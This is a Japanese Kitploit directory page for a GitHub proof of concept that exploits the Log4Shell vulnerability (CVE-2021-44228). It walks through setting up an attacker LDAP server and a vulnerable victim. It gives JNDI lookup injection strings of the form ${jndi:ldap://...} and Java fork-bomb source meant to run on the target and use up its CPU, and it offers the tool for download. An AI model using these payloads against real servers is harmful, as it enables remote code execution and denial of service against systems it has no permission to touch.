Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 概念実証: CVE-2021-44228の脆弱性を利用したリモートサーバー上でのフォーク爆弾起動の例 | Kitploit
ツール/GitHubGitHub/funcid/log4j-exploit-fork-bomb
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールペイロード開発
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 概念実証: CVE-2021-44228の脆弱性を利用したリモートサーバー上でのフォーク爆弾起動の例

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j-exploit-with-fork-bomb

💣💥💀 Proof of Concept: CVE-2021-44228 の脆弱性を利用してリモートサーバー上でフォーク爆弾を実行する例

  1. 攻撃者の LDAP サーバー (server モジュール) を作成します。このサーバーは文字列とコードの表現 (payload モジュール) を提供します。
  2. 被害者のサンプル (victim モジュール) を作成し、Log4j に文字列を渡します。 JRE バージョン <= 6u211, 7u201, 8u191 および 11.0.1
root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. 被害者アプリケーションは攻撃者のサーバーからバイト配列を受け取り、それを埋め込む文字列または実行可能なコードとして解釈します (パラメータ com.sun.jndi.ldap.object.trustURLCodebase = true)
  2. 例として、実行可能なコードはフォーク爆弾 (自身のコピーを起動してすべての CPU 時間を占有するプログラム) になります。
root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
ツールをダウンロード